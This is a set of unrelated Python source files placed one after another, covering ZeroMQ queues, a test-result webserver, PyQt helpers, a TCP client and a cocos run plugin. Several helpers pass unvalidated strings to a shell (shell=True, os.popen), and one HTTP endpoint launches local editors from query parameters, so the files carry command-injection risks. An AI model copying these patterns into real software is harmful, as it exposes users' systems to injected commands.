"""
_ZMQ_SOCKET_RECEIVE_TIMEOUT_MILLISECONDS = 4000
_ZMQ_SOCKET_SEND_TIMEOUT_MILLISECONDS = 2000
_SOCKET_TYPE = zmq.REP
def _ZeroMQResponder(self, source_queue):
"""Listens for requests and replies to clients.
Args:
source_queue (Queue.queue): queue to use to pull items from.
Raises:
RuntimeError: if closed or terminate event is missing.
"""
if not self._closed_event or not self._terminate_event:
raise RuntimeError('Missing closed or terminate event.')
logger.debug('{0:s} responder thread started'.format(self.name))
item = None
while not self._terminate_event.is_set():
if not item:
try:
if self._closed_event.is_set():
item = source_queue.get_nowait()
else:
item = source_queue.get(True, self._buffer_timeout_seconds)
except Queue.Empty:
if self._closed_event.is_set():
break
continue
try:
# We need to receive a request before we can reply with the item.
self._ReceiveItemOnActivity(self._zmq_socket)
except errors.QueueEmpty:
if self._closed_event.is_set() and self._queue.empty():
break
continue
sent_successfully = self._SendItem(self._zmq_socket, item)
item = None
if not sent_successfully:
logger.error('Queue {0:s} unable to send item.'.format(self.name))
break
logger.info('Queue {0:s} responder exiting.'.format(self.name))
self._zmq_socket.close(self._linger_seconds)
def PopItem(self):
"""Pops an item of the queue.
Provided for compatibility with the API, but doesn't actually work.
Raises:
WrongQueueType: As Pop is not supported by this queue.
"""
raise errors.WrongQueueType()
def PushItem(self, item, block=True):
"""Push an item on to the queue.
If no ZeroMQ socket has been created, one will be created the first time
this method is called.
Args:
item (object): item to push on the queue.
block (Optional[bool]): whether the push should be performed in blocking
or non-blocking mode.
Raises:
QueueAlreadyClosed: if the queue is closed.
QueueFull: if the internal buffer was full and it was not possible to
push the item to the buffer within the timeout.
RuntimeError: if closed event is missing.
"""
if not self._closed_event:
raise RuntimeError('Missing closed event.')
if self._closed_event.is_set():
raise errors.QueueAlreadyClosed()
if not self._zmq_socket:
self._CreateZMQSocket()
try:
if block:
self._queue.put(item, timeout=self.timeout_seconds)
else:
self._queue.put(item, block=False)
except Queue.Full as exception:
raise errors.QueueFull(exception)
class ZeroMQBufferedReplyBindQueue(ZeroMQBufferedReplyQueue):
"""A Plaso queue backed by a ZeroMQ REP socket that binds to a port.
This queue may only be used to pop items, not to push.
"""
SOCKET_CONNECTION_TYPE = ZeroMQQueue.SOCKET_CONNECTION_BIND
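# --- Hypothetical usage sketch (not part of the original module) ---
# Pairs a push/bind queue with a pull/connect queue over a random local TCP port,
# the pattern these classes are designed for. The queue names are invented.
def _example_push_pull_pair():
    push_queue = ZeroMQPushBindQueue(name='example_push', delay_open=False)
    pull_queue = ZeroMQPullConnectQueue(
        name='example_pull', delay_open=False, port=push_queue.port)
    push_queue.PushItem('example item')
    item = pull_queue.PopItem()
    pull_queue.Close()
    push_queue.Close()
    return item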
|
webserver.py
|
import time
import threading
import traceback
import json
import nose
import sys
import linecache
import inspect
import os.path
try: # Python 2
import Queue as queue
import urlparse
from StringIO import StringIO
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
import SocketServer as socketserver
except ImportError: # Python 3
import queue
from urllib import parse as urlparse
from io import StringIO
from http.server import HTTPServer, BaseHTTPRequestHandler
import socketserver
from mpi4py import MPI
from nose.plugins.capture import Capture
from nose.plugins.skip import Skip, SkipTest
from nose.core import TestProgram
from multiprocessing import Process, Queue
from optparse import OptionParser
from subprocess import call, Popen, PIPE
EDITOR = None
osascript_to_open_xcode = """on run argv
set linenumber to (item 1 of argv) as integer
set filename_string to item 2 of argv
set file_to_open to POSIX file filename_string
tell application "Xcode"
activate
set doc_to_edit to (open file_to_open)
tell doc_to_edit
set its selection to item linenumber of paragraph of it
end tell
end tell
end run"""
def open_file(path, lineno = 1):
global EDITOR
if sys.platform == 'darwin':
program = Popen(
['osascript', '-', str(lineno), os.path.join(os.getcwd(), path) ],
stdin = PIPE, stdout = PIPE, stderr = PIPE)
out, err = program.communicate(osascript_to_open_xcode)
else:
possible_programs = (
['geany', path, '+'+str(lineno)],
['kate', '-u', '--line',str(lineno),path],
['emacs', '+'+str(lineno), path],
['nedit-client','-line', str(lineno), path],
)
for program in possible_programs:
if program[0] == EDITOR:
returncode = call(['which', program[0]])
if returncode == 0:
call(program)
return
for program in possible_programs:
returncode = call(['which', program[0]])
if returncode == 0:
call(program)
return
call([EDITOR, path])
class HandleRequest(BaseHTTPRequestHandler):
def do_GET(self):
self.parsed_path = urlparse.urlparse(self.path)
path = self.parsed_path.path[1:]
method_name = 'do_' + path
if hasattr(self, method_name):
method = getattr(self,method_name)
string, content_type = method()
else:
if path.endswith(".js"):
string, content_type = self.javascript_file(path)
else:
string, content_type = self.index_file()
self.send_response(200)
self.send_header("Content-type", content_type)
self.send_header("Content-Length", str(len(string)))
self.end_headers()
self.wfile.write(string)
def do_long_poll(self):
self.send_response(200)
self.send_header("Content-Type", "text/javascript")
self.send_header("Transfer-Encoding", "chunked")
self.send_header("Cache-Control", "no-cache, no-store")
self.send_header("Pragma", "no-cache")
self.end_headers()
while True:
self.server.tests_finished.wait(10.0)
if self.server.tests_finished.is_set():
self.send_chunk('true')
self.server.tests_finished.clear()
else:
self.send_chunk('false')
self.wfile.write('0\r\n\r\n')
self.wfile.flush()
def send_chunk(self, string):
hex_length = hex(len(string))[2:]
self.wfile.write('%s\r\n' % hex_length)
self.wfile.flush()
self.wfile.write(string)
self.wfile.write('\r\n')
self.wfile.flush()
def index_file(self):
base = os.path.split(__file__)[0]
filename = os.path.join(base, "realtime_test.html")
with open(filename, "r") as file:
contents = file.read()
return contents, 'text/html'
def javascript_file(self, path):
base = os.path.split(__file__)[0]
filename = os.path.join(base, path)
if not os.path.exists(path):
return '', 'text/javascript'
with open(filename, "r") as file:
contents = file.read()
return contents, 'text/javascript'
def log_message(self, format, *args):
pass
#sys.stderr.write("%s - - [%s] %s\n" %
# (self.address_string(),
# self.log_date_time_string(),
# format%args))
def do_stop(self):
thread = threading.Thread(target=self.server.stop)
thread.daemon = True
thread.start()
return 'null', 'text/javascript'
def do_events(self):
new_events = self.server.get_all_events_since_previous_query()
string = json.dumps(new_events)
content_type = 'text/javascript'
return string, content_type
def do_open_file(self):
parameters = urlparse.parse_qs(self.parsed_path.query)
path = parameters['path'][0]
lineno = int(parameters['lineno'][0])
open_file(path, lineno)
string = 'null'
content_type = 'text/javascript'
return string, content_type
class WebServer(socketserver.ThreadingMixIn, HTTPServer):
def __init__(self, port, request_handler):
HTTPServer.__init__(self, ('', port), request_handler)
self.daemon_threads = True
self.events_queue = queue.Queue()
def start(self):
self.serve_forever()
def stop(self):
self.shutdown()
def get_all_events_since_previous_query(self):
try:
events = []
while True:
events.append(self.events_queue.get(False))
except queue.Empty:
pass
return events
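# --- Hypothetical usage sketch (not part of the original module) ---
# Starts the WebServer on an arbitrary port in a background thread; the port number is
# illustrative. do_long_poll additionally expects a 'tests_finished' threading.Event
# attribute on the server, so one is attached here.
def _example_run_webserver(port=8765):
    server = WebServer(port, HandleRequest)
    server.tests_finished = threading.Event()
    server_thread = threading.Thread(target=server.start)
    server_thread.daemon = True
    server_thread.start()
    # Callers can push event dicts into server.events_queue and later call server.stop().
    return server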
|
pkg.py
|
#!/usr/bin/python3
import os
import sys
import json
import subprocess
from glob import glob
from threading import Thread
from PyQt5.QtCore import QFileInfo, QPointF, QSize, QUrl, Qt, QRect
from PyQt5.QtGui import QColor, QDesktopServices, QFont, QImage, QIcon, QBrush, QPixmap, QPainter, QWindow
from PyQt5.QtWidgets import QFileIconProvider, QGraphicsDropShadowEffect, QListWidgetItem
base_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), "")
user_home_dirs = [
"~/Downloads/",
"~/Documents/",
"~/Desktop/",
"~/Videos/",
"~/Pictures/",
"~/Music/"]
## helpers returning paths (or QIcons) under the package directory
def icon_path(_file: str, icon: bool=False):
if icon:
return QIcon(base_dir + "icons/" + _file)
else:
return base_dir + "icons/" + _file
def ui_path(_file: str):
return base_dir + "ui/" + _file
def style_path(_file: str):
return base_dir + "styles/" + _file
# function to alter image
def mask_image(imgdata, img_size: tuple=(100, 100), size: int=64):
imgtype = os.path.splitext(os.path.split(imgdata)[1])[1]
# Load image
image = QImage.fromData(open(imgdata, "rb").read(), imgtype)
# convert image to 32-bit ARGB (adds an alpha
# channel ie transparency factor):
image = image.convertToFormat(QImage.Format_ARGB32)
# Crop image to a square:
imgsize = min(image.width(), image.height())
rect = QRect(
(image.width() - imgsize) // 2,
(image.height() - imgsize) // 2,
imgsize,
imgsize)
image = image.copy(rect)
# Create the output image with the same dimensions
# and an alpha channel and make it completely transparent:
out_img = QImage(imgsize, imgsize, QImage.Format_ARGB32)
out_img.fill(Qt.transparent)
# Create a texture brush and paint a circle
# with the original image onto the output image:
brush = QBrush(image)
# Paint the output image
painter = QPainter(out_img)
painter.setBrush(brush)
# Don't draw an outline
painter.setPen(Qt.NoPen)
# drawing circle
painter.drawEllipse(0, 0, imgsize, imgsize)
# closing painter event
painter.end()
# Convert the image to a pixmap and rescale it.
pr = QWindow().devicePixelRatio()
pm = QPixmap.fromImage(out_img)
pm.setDevicePixelRatio(pr)
size *= pr
pm = pm.scaled(img_size[0], img_size[1], Qt.KeepAspectRatio,
Qt.SmoothTransformation)
# return back the pixmap data
return pm
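## --- Hypothetical usage sketch (not part of the original module) ---
## Turns a square avatar file into a circular pixmap; "avatar.png" and the sizes are
## invented values, and a QApplication must already be running.
def _example_circular_avatar(path: str="avatar.png"):
    return mask_image(path, img_size=(64, 64), size=64)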
def add_item(obj, icon: QIcon, text: str="", tooltip: str="", selectable: bool=False,
select: bool=False, checkable: bool=False, check: bool=False, hide: bool=False,
font_size: int=10, icon_size=(25, 25), enabled: bool=True, dis_bg: str="#efeeef",
alignment=None, icon_theme: bool=False, icon_provider: bool=False):
font = QFont()
font.setPixelSize(font_size)
att = QListWidgetItem()
att.setText(text)
att.setHidden(hide)
att.setFont(font)
if icon and isinstance(icon, str):
if icon_provider:
icon = icon_types(icon)
elif icon_theme:
icon = QIcon.fromTheme(icon)
else:
icon = QIcon(icon)
att.setIcon(icon)
else:
att.setIcon(icon)
if tooltip:
att.setToolTip(tooltip)
if checkable:
att.setCheckState(check)
if selectable:
att.setSelected(select)
obj.setIconSize(QSize(icon_size[0], icon_size[1]))
if not enabled:
att.setFlags(Qt.NoItemFlags)
att.setBackground(QColor(dis_bg))
if alignment is not None:
att.setTextAlignment(alignment)
return att
def get_line(obj):
text = str(obj.text()).strip()
try:
ext = text.split(":")
suffix = ""
for i in ext[1:]:
suffix += " " + i
if len(ext) >= 2:
return ext[0], suffix.strip()
except IndexError:
return None
def icon_types(_file: str, is_file: list=[False, ""]):
file_type = os.path.splitext(os.path.split(_file)[1])[1].strip(".")
## set image/video icon
if file_type in json.load(open(base_dir + "api/icons.json")).get("Image"):
if not is_file[0]:
return QIcon(_file)
else:
return _file
## Default System Icons
else:
fileInfo = QFileInfo(_file)
iconProvider = QFileIconProvider()
icon = iconProvider.icon(fileInfo)
if not is_file[0]:
return icon
else:
iconProvider.icon(fileInfo).pixmap(200, 200).save(is_file[1], "png")
return is_file[1]
def api_icons(_type: str, default: list=[]):
try:
return json.load(open(base_dir + "api/icons.json")).get(_type, default)
except KeyError:
return ""
def Import(_file: str):
try:
import importlib
spec = importlib.util.spec_from_file_location(
os.path.split(_file)[1].split(".")[0], _file)
foo = importlib.util.module_from_spec(spec)
spec.loader.exec_module(foo)
except Exception:
import imp
foo = imp.load_package(os.path.split(_file)[1].split(".")[0], _file)
return foo
def set_image(_file: str, icon: bool=False, size: int=150):
if icon:
return _file.pixmap(QSize(size, size))
else:
return QIcon(_file).pixmap(QSize(size, size))
def add_item_widget(item, item_widget, text: str="",
subtitle: str="", hotkey: str="",
no_subtitle: bool=False, item_size=(250, 40)):
frame = item_widget
frame.title.setText(text)
frame.hotkey.setText(hotkey)
if no_subtitle:
frame.subtitle.hide()
frame.subtitle.setStyleSheet("")
else:
frame.subtitle.show()
frame.subtitle.setText(subtitle)
item.setSizeHint(QSize(item_size[0], item_size[1]))
return (item, frame)
def get_sys_icon(_name: str):
_icon = QIcon.fromTheme(_name)
return _icon
def _ext_json(_path: str, key: str, value: str=""):
return json.load(open(str(_path + "package.json"))).get(key.lower(), value)
def set_item_widget(obj, item):
obj.addItem(item[0])
obj.setItemWidget(item[0], item[1])
def set_item(obj, item):
obj.addItem(item)
def run_app(cmd: object):
Thread(target=lambda: subprocess.call(cmd, shell=True, stderr=None, stdin=None, stdout=None), daemon=True).start()
def get_size(bytes, suffix="B"):
"""
Scale bytes to its proper format
e.g:
1253656 => '1.20 MB'
1253656678 => '1.17 GB'
"""
factor = 1024
for unit in ["", "K", "M", "G", "T", "P"]:
if bytes < factor:
return f"{bytes:.2f} {unit}{suffix}"
bytes /= factor
try:
import vlc
class video_player:
def __init__(self, frame, file: str="", on_changed: object=None):
self.frame = frame
self.file = file
self.on_changed = on_changed
self.__instance = vlc.Instance()
self.__mediaplayer = self.__instance.media_player_new()
if self.on_changed:
self.__vlc_event_manager = self.__mediaplayer.event_manager()
self.__vlc_event_manager.event_attach(vlc.EventType.MediaPlayerTimeChanged, self.on_changed)
if sys.platform.startswith("linux"):
self.__mediaplayer.set_xwindow(self.frame.winId())
elif sys.platform == "win32":
self.__mediaplayer.set_hwnd(self.frame.winId())
elif sys.platform == "darwin":
self.__mediaplayer.set_nsobject(self.frame.winId())
if self.file:
media = self.__instance.media_new(self.file)
self.__mediaplayer.set_media(media)
@property
def media(self):
return self.__mediaplayer
@property
def instance(self):
return self.__instance
def set_media(self, file):
media = self.__instance.media_new(file)
self.__mediaplayer.set_media(media)
except (ImportError, ImportWarning, ModuleNotFoundError):
pass
def set_box_shadow(blur: int = 5, point: tuple = (5, 5), color: str = "black"):
# creating a QGraphicsDropShadowEffect object
shadow = QGraphicsDropShadowEffect()
# setting blur radius (optional step)
shadow.setBlurRadius(blur)
## set shadow position
shadow.setOffset(QPointF(point[0], point[1]))
## set a property option
shadow.setProperty("color", color)
return shadow
def find_in_all(query: str, path: str="~/"):
result = {}
paths = glob(os.path.expanduser(path) + "*")
if query.strip():
for dn in paths:
if os.path.isdir(dn):
paths.extend(glob(dn + "/*"))
result.update({os.path.split(dn)[1]: dn})
elif query.strip() in dn.strip():
result.update({os.path.split(dn)[1]: dn})
return result
def find_in(query: str, path: object="~/"):
result = {}
if query.strip() and isinstance(path, str):
for i in glob(os.path.expanduser(os.path.expandvars(path)) + "*"):
if query in i:
result.update({os.path.splitext(os.path.split(i)[1])[0]: i})
elif query.strip() and isinstance(path, (list, tuple)):
for i in path:
for j in glob(os.path.expanduser(os.path.expandvars(i)) + "*"):
if query in j:
result.update({os.path.splitext(os.path.split(j)[1])[0]: j})
return result
def get_split_file(_file):
return (
os.path.dirname(_file),
os.path.splitext(os.path.basename(_file))[0],
os.path.splitext(os.path.basename(_file))[1]
)
def get_platform():
if sys.platform.startswith(("linux")):
platform = "linux"
elif sys.platform.startswith("win"):
platform = "windows"
elif sys.platform.startswith("darw"):
platform = "macos"
else:
platform = "all"
return platform
def get_system_name():
if sys.platform.startswith(("linux")):
platform = "Linux"
elif sys.platform.startswith("win"):
platform = "Windows"
elif sys.platform.startswith("darw"):
platform = "MacOS"
else:
platform = "UnKnow"
return platform
def open_url(_file: str):
QDesktopServices.openUrl(QUrl.fromUserInput(_file))
def cmd_open_url(_file: str):
run_app("xdg-open '%s'" % _file)
def run_thread(func: object, *args, **kwargs):
Thread(target=func, daemon=True, args=args, kwargs=kwargs).start()
def get_cmd_output(*args):
t = ""
for i in args:
t += i + " "
return os.popen(t, "r")
|
client-multithread.py
|
import requests
import random
import threading
import sys
HOST, PORT = "localhost", 9999
data_url = "http://localhost:3000/test_data/file"
max_file_count = 9
max_file_name = 9
nthreads = int(sys.argv[1])
def client_method():
fnames = ''
nfiles = random.randrange(0, max_file_count)
for i in range(nfiles):
fname = data_url + str(random.randrange(1, max_file_name + 1))
if i != 0:
fnames += ','
fnames += fname
print(fnames)
r = requests.post("http://{}:{}".format(HOST, PORT), data = fnames, headers={"Content-Length" : str(len(fnames)) } )
print(r.text)
# Spawn threads that each run client_method.
for i in range(nthreads):
th = threading.Thread(target=client_method)
th.daemon = False
th.start()
|
client_socket.py
|
"""
client_socket.py:
Socket used to attach to the TCP server as a client and read/write data.
"""
import select
import socket
import threading
from fprime.constants import DATA_ENCODING
from fprime_gds.common.handlers import DataHandler
# Constants for public use
GUI_TAG = "GUI"
FSW_TAG = "FSW"
class ThreadedTCPSocketClient(DataHandler):
"""
Threaded TCP client that connects to the socket server that serves packets from the flight
software
"""
def __init__(self, sock=None, dest=FSW_TAG):
"""
Threaded client socket constructor
Keyword Arguments:
sock {Socket} -- A socket for the client to use. Creates its own if
None (default: {None})
"""
if sock is None:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
else:
self.sock = sock
# NOTE can't do this b/c EINPROGRESS: self.sock.setblocking(0)
self.dest = dest
self.__distributors = []
self.__select_timeout = 1
self.__data_recv_thread = threading.Thread(target=self.recv)
self.stop_event = threading.Event()
def get_data_bytes(self, string_data):
"""
Convert the data from string to bytes
:param string_data: data in string format
:return: data in bytes format
"""
return string_data.encode(DATA_ENCODING)
def get_data_string(self, bytes_data):
"""
Convert the data from bytes to string
:param bytes_data: data in bytes format
:return: data in string format
"""
return bytes_data.decode(DATA_ENCODING)
def register_distributor(self, distributor):
"""Registers a fprime.gds.distributor object with this socket
Arguments:
distributor {fprime.gds.distributor.Distributor} -- must implement data_callback
"""
self.__distributors.append(distributor)
def register_to_server(self, register_as):
"""
Registers the caller to the server as type register_as
This function assumes the socket connects to an fprime TCP server
Args:
register_as (string): How to identify this process to the TCP server
Can be either "FSW" or "GUI"
"""
data = "Register %s\n" % register_as
self.sock.send(self.get_data_bytes(data))
def connect(self, host, port):
"""Connect to host at given port and start the threaded recv method.
Arguments:
host {string} -- IP of the host server
port {int} -- Port of the host server
"""
try:
self.sock.connect((host, port))
self.__data_recv_thread.start()
except OSError:
print("There was a problem connecting to the TCP Server")
exit(-1)
def disconnect(self):
"""Disconnect the socket client from the server and stop the internal thread.
"""
self.stop_event.set()
self.__data_recv_thread.join()
self.sock.close()
def data_callback(self, data, sender=None):
"""
Handles incoming data by sending it to a socket.
:param data: data to send to the client socket
:param sender: sender source of the data
"""
self.send(data, self.dest)
def send(self, data, dest):
"""
Send data to the server
All necessary headers are added in this function.
Arguments:
data {binary} -- The data to send (What you want the destination
to receive)
dest {String} -- Where to send the data to. Either "FSW" or "GUI"
"""
self.sock.send(b"A5A5 %s %s" % (self.get_data_bytes(dest), data))
def recv(self):
"""
Method run constantly by the enclosing thread. Looks for data from the server.
"""
while not self.stop_event.is_set():
ready = select.select([self.sock], [], [], self.__select_timeout)
if ready[0]:
chunk = self.sock.recv(1024)
for d in self.__distributors:
d.on_recv(chunk)
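# --- Usage sketch (illustration only, not part of the original module) ---
# Connect to a hypothetical fprime TCP server, register as a GUI client and send
# one raw payload to the flight software; host, port and payload are assumptions.
if __name__ == "__main__":
    client = ThreadedTCPSocketClient(dest=FSW_TAG)
    client.connect("127.0.0.1", 50000)
    client.register_to_server(GUI_TAG)
    client.send(b"example-payload", FSW_TAG)
    client.disconnect()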
|
project_run.py
|
#!/usr/bin/python
# ----------------------------------------------------------------------------
# cocos "install" plugin
#
# Author: Luis Parravicini
#
# License: MIT
# ----------------------------------------------------------------------------
'''
"run" plugin for cocos command line tool
'''
__docformat__ = 'restructuredtext'
import sys
import os
import cocos
from MultiLanguage import MultiLanguage
import webbrowser
import threading
import subprocess
import re
if(sys.version_info.major >= 3):
from http.server import BaseHTTPRequestHandler,HTTPServer
else:
import BaseHTTPServer
class CCPluginRun(cocos.CCPlugin):
"""
Compiles a project and runs it on the target
"""
@staticmethod
def depends_on():
return ('deploy',)
@staticmethod
def plugin_name():
return "run"
@staticmethod
def brief_description():
return MultiLanguage.get_string('RUN_BRIEF')
def _add_custom_options(self, parser):
parser.add_argument("-m", "--mode", dest="mode", default='debug',
help=MultiLanguage.get_string('RUN_ARG_MODE'))
group = parser.add_argument_group(MultiLanguage.get_string('RUN_ARG_GROUP_WEB'))
group.add_argument("-b", "--browser", dest="browser",
help=MultiLanguage.get_string('RUN_ARG_BROWSER'))
group.add_argument("--param", dest="param",
help=MultiLanguage.get_string('RUN_ARG_PARAM'))
group.add_argument("--port", dest="port", metavar="SERVER_PORT", nargs='?',
help=MultiLanguage.get_string('RUN_ARG_PORT'))
group.add_argument("--host", dest="host", metavar="SERVER_HOST", nargs='?', default='127.0.0.1',
help=MultiLanguage.get_string('RUN_ARG_HOST'))
group.add_argument("--no-console", action="store_true", dest="no_console", default=False,
help=MultiLanguage.get_string('RUN_ARG_NO_CONSOLE'))
group.add_argument("--working-dir", dest="working_dir", default='',
help=MultiLanguage.get_string('RUN_ARG_WORKING_DIR'))
group = parser.add_argument_group(MultiLanguage.get_string('RUN_ARG_GROUP_IOS'))
group.add_argument("-sdk", dest="use_sdk", metavar="USE_SDK", nargs='?', default='iphonesimulator',
help=MultiLanguage.get_string('RUN_ARG_IOS_SDK'))
def _check_custom_options(self, args):
self._port = args.port
self._mode = args.mode
self._host = args.host
self._browser = args.browser
self._param = args.param
self._no_console = args.no_console
self._working_dir = args.working_dir
def get_ios_sim_name(self):
# get the version of xcodebuild
ver = cocos.get_xcode_version()
match = re.match(r'(\d+).*', ver)
ret = None
if match:
ver_num = int(match.group(1))
if ver_num <= 5:
ret = "ios-sim-xcode5"
elif ver_num < 8:
ret = "ios-sim-xcode6"
return ret
def _get_cmd_output(self, cmds):
child = subprocess.Popen(cmds, stdout=subprocess.PIPE)
out = child.stdout.read()
child.wait()
errCode = child.returncode
return (errCode, out)
def _get_simulator_id(self):
(errCode, out) = self._get_cmd_output([ "xcrun", "instruments", "-s" ])
names = []
if errCode == 0:
pattern = r'(^iPhone[^\[]+)\[(.*)\]\s*\(Simulator\)'
lines = out.split('\n')
for line in lines:
match = re.match(pattern, line)
if match:
info = {
"name" : match.group(1),
'id' : match.group(2)
}
names.append(info)
ret = None
retName = None
phoneTypeNum = 0
phoneType = ''
iosVer = 0
if len(names) > 0:
name_pattern = r'iPhone\s+((\d+)[^\(]+)\((.*)\)'
for info in names:
name = info["name"]
id = info["id"]
if name.find('Apple Watch') > 0:
continue
match = re.match(name_pattern, name)
if match:
# get the matched data
typeNum = int(match.group(2))
tmpType = match.group(1)
tmpIOSVer = match.group(3)
if ((typeNum > phoneTypeNum) or
(typeNum == phoneTypeNum and tmpType > phoneType) or
(typeNum == phoneTypeNum and tmpType == phoneType and cocos.version_compare(tmpIOSVer, '>', iosVer))):
# find the max phone type number first
ret = id
retName = name.strip()
phoneTypeNum = typeNum
phoneType = tmpType
iosVer = tmpIOSVer
if ret is None:
raise cocos.CCPluginError('Failed to get a simulator!')
print('Using simulator: %s' % retName)
return ret
def _get_bundle_id(self, app_path):
plistFile = os.path.join(app_path, 'Info.plist')
(errCode, out) = self._get_cmd_output([ 'plutil', '-convert', 'json', '-o', '-', plistFile ])
ret = None
if errCode == 0:
import json
jsonObj = json.loads(out)
if jsonObj is not None and 'CFBundleIdentifier' in jsonObj:
ret = jsonObj['CFBundleIdentifier']
if ret is None:
raise cocos.CCPluginError('Failed to get the bundle ID of app %s' % app_path)
return ret
def _run_ios_app(self, ios_app_path):
if not cocos.os_is_mac():
raise cocos.CCPluginError('Running the iOS simulator is currently only supported on macOS')
# get bundle id
bundle_id = self._get_bundle_id(ios_app_path)
# find simulator
simulator_id = self._get_simulator_id()
try:
# run the simulator
xcode_version = cocos.get_xcode_version()
xcode9_and_upper = cocos.version_compare(xcode_version,">=",9)
if xcode9_and_upper:
self._run_cmd('xcrun simctl boot "%s"' % simulator_id)
self._run_cmd('open `xcode-select -p`/Applications/Simulator.app')
else:
self._run_cmd('xcrun instruments -w "%s"' % simulator_id)
except Exception as e:
pass
# install app
self._run_cmd('xcrun simctl install "%s" "%s"' % (simulator_id, ios_app_path))
# run app
self._run_cmd('xcrun simctl launch "%s" "%s"' % (simulator_id, bundle_id))
def run_ios_sim(self, dependencies):
if not self._platforms.is_ios_active():
return
deploy_dep = dependencies['deploy']
if deploy_dep._use_sdk == 'iphoneos':
cocos.Logging.warning(MultiLanguage.get_string('RUN_WARNING_IOS_FOR_DEVICE_FMT',
os.path.dirname(deploy_dep._iosapp_path)))
else:
ios_sim_name = self.get_ios_sim_name()
if ios_sim_name is None:
# there is no ios-sim for the currently installed Xcode
# try to use xcrun commands
self._run_ios_app(deploy_dep._iosapp_path)
else:
if getattr(sys, 'frozen', None):
cur_dir = os.path.realpath(os.path.dirname(sys.executable))
else:
cur_dir = os.path.realpath(os.path.dirname(__file__))
iossim_exe_path = os.path.join(cur_dir, 'bin', ios_sim_name)
launch_sim = "%s launch \"%s\" &" % (iossim_exe_path, deploy_dep._iosapp_path)
self._run_cmd(launch_sim)
def run_ios_device(self):
if not self._platforms.is_ios_active():
return
cocos.Logging.warning('Running on iOS devices is not supported.')
def _run_with_desktop_options(self, cmd):
if self._no_console:
cmd += ' -console no'
if self._working_dir:
cmd += ' -workdir "%s"' % self._working_dir
self._run_cmd(cmd)
def run_mac(self, dependencies):
if not self._platforms.is_mac_active():
return
deploy_dep = dependencies['deploy']
launch_macapp = '\"%s/Contents/MacOS/%s\"' % (deploy_dep._macapp_path, deploy_dep.target_name)
self._run_with_desktop_options(launch_macapp)
def run_android_device(self, dependencies):
if not self._platforms.is_android_active():
return
sdk_root = cocos.check_environment_variable('ANDROID_SDK_ROOT')
adb_path = cocos.CMDRunner.convert_path_to_cmd(os.path.join(sdk_root, 'platform-tools', 'adb'))
deploy_dep = dependencies['deploy']
startapp = "%s shell am start -n \"%s/%s\"" % (adb_path, deploy_dep.package, deploy_dep.activity)
self._run_cmd(startapp)
pass
def open_webbrowser(self, url):
if self._browser is None:
threading.Event().wait(1)
webbrowser.open_new(url)
else:
if cocos.os_is_mac():
if self._param is None:
url_cmd = "open -a \"%s\" \"%s\"" % (self._browser, url)
else:
url_cmd = "\"%s\" \"%s\" %s" % (self._browser, url, self._param)
else:
if self._param is None:
url_cmd = "\"%s\" %s" % (self._browser, url)
else:
url_cmd = "\"%s\" \"%s\" %s" % (self._browser, url, self._param)
self._run_cmd(url_cmd)
def run_web(self, dependencies):
if not self._platforms.is_web_active():
return
# pick the request handler / server classes for the running Python version
if(sys.version_info.major >= 3):
from http.server import SimpleHTTPRequestHandler
ServerClass = HTTPServer
else:
from SimpleHTTPServer import SimpleHTTPRequestHandler
ServerClass = BaseHTTPServer.HTTPServer
HandlerClass = SimpleHTTPRequestHandler
Protocol = "HTTP/1.0"
HandlerClass.protocol_version = Protocol
host = self._host
if self._port is None:
port = 8000
port_max_add = 2000
else:
port = int(self._port)
port_max_add = 0
deploy_dep = dependencies['deploy']
run_root = deploy_dep.run_root
i = 0
httpd = None
while (i <= port_max_add):
port += i
i += 1
server_address = (host, port)
try:
cocos.Logging.info(MultiLanguage.get_string('RUN_INFO_HOST_PORT_FMT', (host, port)))
httpd = ServerClass(server_address, HandlerClass)
except Exception as e:
httpd = None
cocos.Logging.warning(MultiLanguage.get_string('RUN_WARNING_SERVER_FAILED_FMT', (host, port, e)))
if httpd is not None:
break
if httpd is None:
raise cocos.CCPluginError(MultiLanguage.get_string('RUN_ERROR_START_SERVER_FAILED'),
cocos.CCPluginError.ERROR_OTHERS)
from threading import Thread
sub_url = deploy_dep.sub_url
url = 'http://%s:%s%s' % (host, port, sub_url)
thread = Thread(target = self.open_webbrowser, args = (url,))
thread.start()
sa = httpd.socket.getsockname()
with cocos.pushd(run_root):
cocos.Logging.info(MultiLanguage.get_string('RUN_INFO_SERVING_FMT', (sa[0], sa[1])))
httpd.serve_forever()
def run_win32(self, dependencies):
if not self._platforms.is_win32_active():
return
deploy_dep = dependencies['deploy']
run_root = deploy_dep.run_root
exe = deploy_dep.project_name
with cocos.pushd(run_root):
self._run_with_desktop_options(os.path.join(run_root, exe))
def run_linux(self, dependencies):
if not self._platforms.is_linux_active():
return
deploy_dep = dependencies['deploy']
run_root = deploy_dep.run_root
exe = deploy_dep.project_name
with cocos.pushd(run_root):
self._run_with_desktop_options(os.path.join(run_root, exe))
def run_tizen(self, dependencies):
if not self._platforms.is_tizen_active():
return
deploy_dep = dependencies['deploy']
tizen_packageid = deploy_dep.tizen_packageid
tizen_studio_path = cocos.check_environment_variable("TIZEN_STUDIO_HOME")
tizen_cmd_path = cocos.CMDRunner.convert_path_to_cmd(os.path.join(tizen_studio_path, "tools", "ide", "bin", "tizen"))
startapp = "%s run -p %s" % (tizen_cmd_path, tizen_packageid)
self._run_cmd(startapp)
def run(self, argv, dependencies):
self.parse_args(argv)
cocos.Logging.info(MultiLanguage.get_string('RUN_INFO_START_APP'))
self.run_android_device(dependencies)
self.run_ios_sim(dependencies)
# self.run_ios_device()
self.run_mac(dependencies)
self.run_web(dependencies)
self.run_win32(dependencies)
self.run_linux(dependencies)
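# --- Illustrative sketch (added, not part of the cocos plugin) ---
# run_web() above retries consecutive ports until the HTTP server binds. The same
# idea in isolation, using only the Python 3 standard library:
if __name__ == "__main__":
    from http.server import HTTPServer as _HTTPServer, SimpleHTTPRequestHandler as _Handler
    _httpd = None
    for _offset in range(10):
        try:
            _httpd = _HTTPServer(("127.0.0.1", 8000 + _offset), _Handler)
            break
        except OSError:
            continue
    if _httpd is not None:
        print("bound to port", _httpd.server_address[1])
        _httpd.server_close()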
|
initialize.py
|
from distutils.version import LooseVersion
import requests
import os
import shutil
import threading
import webbrowser
from zipfile import ZipFile
from pathlib import Path
import traceback
import tempfile
# import concurrent.futures
from flask import Flask, url_for, make_response
from flask.json import dumps
from flask_restx import Api
from mindsdb.__about__ import __version__ as mindsdb_version
from mindsdb.interfaces.datastore.datastore import DataStore
